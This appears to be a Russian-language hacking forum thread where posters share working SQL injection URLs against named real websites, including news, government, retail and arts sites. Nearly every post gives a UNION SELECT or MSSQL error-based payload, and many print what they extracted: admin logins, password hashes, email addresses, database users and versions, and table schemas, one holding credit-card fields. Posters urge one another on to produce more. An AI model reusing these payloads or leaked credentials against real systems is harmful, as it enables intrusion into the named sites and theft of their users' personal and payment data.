МАКС http://www.aviasalon.com SQL-инъекция содержится в форме поиска. Двойная кавычка вызывает ошибку в SQL-запросе, что даёт возможность узнать установочный путь скрипта (/home/aviasalon.com/data/htdocs/modules/mod_search.php), а также увидеть текст нескольких SQL-запросов. Так можно получить информацию об именах некоторых таблиц и их полях.
Таблица: поля
engine_page: id, title, menu_id, content, keywords, description, status
list_param_value: value, item_id
list_item: id, title, alias, type_id
list_type: alias, id, prefix, suffix, title
data_news_item: title, alias, content, anons, topic_id
data_news_topic: alias, id
data_expo_company: title, alias, about, contacts
Запрос с одинарной кавычкой вызовет ошибку в регулярном выражении, раскрыв путь скрипта на сервере (см. выше).
Для Myke007 Усердней!!!!!! Code: http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,psw),10,11+from+login+limit+0,1/* Поля : Code: username, psw
Code: http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/* Admins Password eMail dloosemore /e8a59ea2c530174b8f60562d05a4403f /[email protected] praycroft /b35c7298864f797f41e7b9da8781ed63 /[email protected] picto_admin /0ef2057aa44ce08666f6a5876bf8da19 /[email protected]
Code: http://www.[COLOR=DarkGreen]sthscareers.com[/COLOR]/news.php?id=-76+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),5,6,7,8,9,10,11,12,13,14,15/* root@localhost::sths_hr1::4.1.10a Code: http://www.[COLOR=DarkGreen]americanfibersystems.com[/COLOR]/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9,10,11,12/* afsnetworks2@localhost::afs_site::4.1.20 Code: http://www.[COLOR=Green]americanfibersystems.com[/COLOR]/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),username,passwd),4,5,6,7,8,9,10,11,12+from+users/* admin::b6983419181946ae88210bf45a998e5b [email protected]::6b340fa679eca67086d97ddbfb9894c3::majerle
Code: http://www.nfb.ca/about/news.php?id=-1585+union+select+1,version(),3,concat_ws(0x2F,login,pass),5,6,7,8,9,10,11,12,13,14+from+user/* Version: 5.0.37-log/webadmin@localhost/texte Admins: Login Password florence / *C6E74EDED542939C3FF2F2277CD9EDD14719455A ryan /*8DC81F46F004E99DD2347305BF897C973FD50956
мозгоёбство: стока парица, и нет ничё нормального. Code: http://www.filmdeculte.com/film/film.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+film/* 4-ая ветка =\
Code: http://www.[COLOR=Olive]exploresouthbend.org[/COLOR]/news.php?id=-96+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),4,5/* [email protected]::livethelegends::4.1.10a-log Code: http://www.[COLOR=Olive]gemeindebund.at[/COLOR]/news.php?id=-334+union+select+1,2,3,4,5,concat_ws(char(58,58),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* [email protected]::cad_gemeindebund::4.0.24-standard
Code: http://www.tweak.dk/nyheder2.php?id=-15246+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/* Code: http://www.salesafter.de/index.php?id=-30+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13/*
Это мой первый пост так что не судите строго, если что то не так =) http://www.ugkr.ru/news.asp?id=-842+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19.20,21,22,23-- http://www.ugkr.ru/news.asp?id=-842%20union%20select%201,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19.20,21,22,23%20from%20information_schema.tables%20where%20table_name%20not%20in%20('ABITUR','BIBLIOTEKA')-- Нужная табличка USRGENERAL, а вот список столбцов в ней: FIRSTLOGON ID KEYKOD KOD_1S NAME1 NAME2 NAME3 PASKEY PASSWORD USER_BIRTH USER_GENDER USER_INN USER_MAIL USER_PROXCART USER_RIGHT USER_SPEC USER_STUD_STAT_PERIOD USER_STUD_STATUS USER_TYPE USER_UCHGROUP USER_UDOST USER_UDOST_DATE USER_UDOST_NOMER USER_UDOST_SERIAL
http://www.funisland.com/gamelist.php?id=-13+UNION+SELECT+1,password,username,4,5,6,7,8,9,10,11,12,13,14,15+from+admin/*
Code: http://www.recado.ru/index.php?id=9999+union+select+1,2,concat(user,0x3a,pass)+from+users+limit+0,1/* Code: http://www.shemaroo.com/online/product.asp?productid=2279'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl'))--&sent=1 Tables: 'ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl Columns из "Login": 'KeyID','LastLogDate','LoginId','PassAns','PassQues','Password','Status' Code: http://musical-shop.de/details.asp?Artikelnr=10301'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks'))-- Tables: Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks','Werbebanner' Code: http://www.dvd-shop.ch/result.php?menuid=2'+union+select+1,21,3,table_name+from+information_schema.tables+where+table_name+not+in+('CHARACTER_SETS','COLLATIONS','COLLATION_CHARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS')/* Code: 
http://www.artrainusa.org/artwork.asp?item=(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Sales'%20and%20column_name%20not%20in%20('CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'))-- Tables: 'News','Calendar','Catalog','dtproperties','Features','Sales','sysconstraints' Columns из 'Sales': 'CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'
Code: http://www.acte.org/resources/press_release.php?id=-91+union+select+1,2,3,concat(id,0x3a,login,0x3a,password),5,6,7,8,9+from+users/* Code: http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat(ID,0x3a,username,0x3a,password),3,4,5,6+from+P_admin/* Code: http://www.bactravel.it/centri/schede.php?id=-9+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Первая инъекция, сильно не ругайте Code: http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+database(),2,VERSION(),user(),5,6,7,8,9,10/* Code: http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+1,name,3,4,5,6,7,8,9,10+from+users+where+name=admin/*
Немного доработал, от меня такой вариант: HTML: http://www.malco.com/index.php?page=movie_cinema&movie_id=1993+union+select+concat(name,0x3a,email),2,3,4,5,6,7,8,9,10+from+users/*
убийствеенная скуля в mssql(это всё одна скуля) тут выводить не стал, т.к. то что вывел для себя- всеравно не подошло. Code: http://www.cerclefinance.com/default.asp?pub=valactu&localcode=&isin=&art=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('REFERENTIAL_CONSTRAINTS','ficcf13000EMAILS' ,'Portrait_Type','site','CHECK_CONSTRAINTS','CONSTRAINT_TABLE_USAGE','Pays_Calsta','cf_stat_1','CONSTRAINT_COLUMN_USAGE' ,'non_membres'','VIEWS','compteur_connexions',,)'VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE','calendrier_stat','audit_lignes' ,'Sondage_Trace','dtproperties','valtop','Interview','articles','Hard-Bounces','Dossier_Lexique','exception','Interview_Futur','utilisateur' ,'emailing_tmp','cp_20070426','pays','Dossier','alerte_env','email_env','menu_profil','habilitation_journaliste','questions','articles_test' ,'newsvaleurlast','envoi','Interview_Type','avis_des_brokers','type_article','PROFIL','format','menu','Conseils','desabonne','t_jiaozhu', 'email_SNCF','articles_sauv','Dossier_Theme','ICB','popup','Economic_group','CF_ibase','accnew','tmpemail','newsvaleur','stocksname', 'nospam','aide','Dep','membres_relance','emailing_Effidata','CF_vue_nb_mails','forum2','concours','enquete','CmdShell','pop_email' ,'seuils_et_resistances','parties_payantes','DossiersTMP','calendrier_ste','concours_oct2001_questions','eco_group','cookies','Contacts_CP' ,'liens_articles','ENTREPRISE',''Interview_Bio','emailing_tmp_Himedia','essai','membres_email_faux','concours_oct2001_reponses','newshebdo' ,'mailing_cpr','images','initiation','KEY_COLUMN_USAGE','markviral','CreaFinance_Mails','morning_env','membres','CONSULTATION_ARTICLE' ,'DateXML5','nokia','membres3','articles_2003','noms','env_tmp_atos_sg','noms2','Valeur_perso','avisdesbrokers','pub','stats','non_membres _email_faux','concours_oct2001_participants','valtopbs','habilitation','JOUR_FERIE','forum','ibase_20070122','Interview_QR','type_xml','FTP_Trace', 
'groupe_menu','tmpemail2','nochronique','articles_2002','EMail_20060616','fondamentaux','emailing_tmp_ibase','invalides','ficcfp','OST','stat_membres ','secteur','Sondage_Proposition','utilisateurs_click_and_buy','Sondage','syssegments','situation','sysconstraints','sysalternates','etudes' ,'SCHEMATA','TABLES','membres_v2','TABLE_CONSTRAINTS','FauxEmails','TABLE_PRIVILEGES','COLUMNS','centre','COLUMN_DOMAIN_USAGE' ,'COLUMN_PRIVILEGES','DOMAINS','Portrait','DOMAIN_CONSTRAINTS','invalides_20071129','recommandations'))--
Для Mike007 Когда начнём стараться?! Code: http://www.dualtime.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/* 4.0.27:replica_db0:[email protected] Code: http://www.mywatches.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/* 5.0.45-log:u80484:[email protected] Code: http://www.atlantic-time.ru/page.php?n=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4/* 5.0.45-log:u48597:[email protected]
Тут можно вынести всю базу: Code: http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3a,password),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/* Хеш с солью Code: http://www.3roms.com/index.php?page=rom_dl&rid=-1'+union+select+1,concat(username,0x3,password,0x3a,salt),icq,4,5,6,7,convert(concat(user(),0x3,version(),0x3,database())+using+latin1),9,10,11,12+from+user+limit+1,2/*